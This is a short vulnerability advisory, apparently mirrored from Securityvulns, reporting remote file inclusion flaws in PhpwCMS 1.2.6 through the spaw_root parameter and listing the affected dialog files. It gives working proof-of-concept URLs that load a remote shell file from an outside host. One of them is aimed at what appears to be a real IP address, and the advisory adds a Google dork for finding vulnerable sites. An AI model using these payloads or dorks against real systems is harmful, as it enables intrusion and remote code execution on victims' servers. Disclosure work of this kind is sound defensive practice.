SecurityvulnsSECURITYVULNS:DOC:13842PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities
PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities
Discovered by :
|\/| _ ._ _ …
| |()| (|(_|| |
_|
Vuln In :
include $spaw_root.'class/lang.class.php';
Affected Files :
include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php
Vendor Website: http://www.phpwcms.de/
PoC:
http://victim-site/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmo
rgan.net/shell.dat?
Example:
http://132.195.14.67/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=h
ttp://ehmorgan.net/shell.dat?
Google Dork:
inurl:"phpwcms/index.php?id="
Visit us :
www.ehmorgan.net
irc.gigachat.net
#Morgan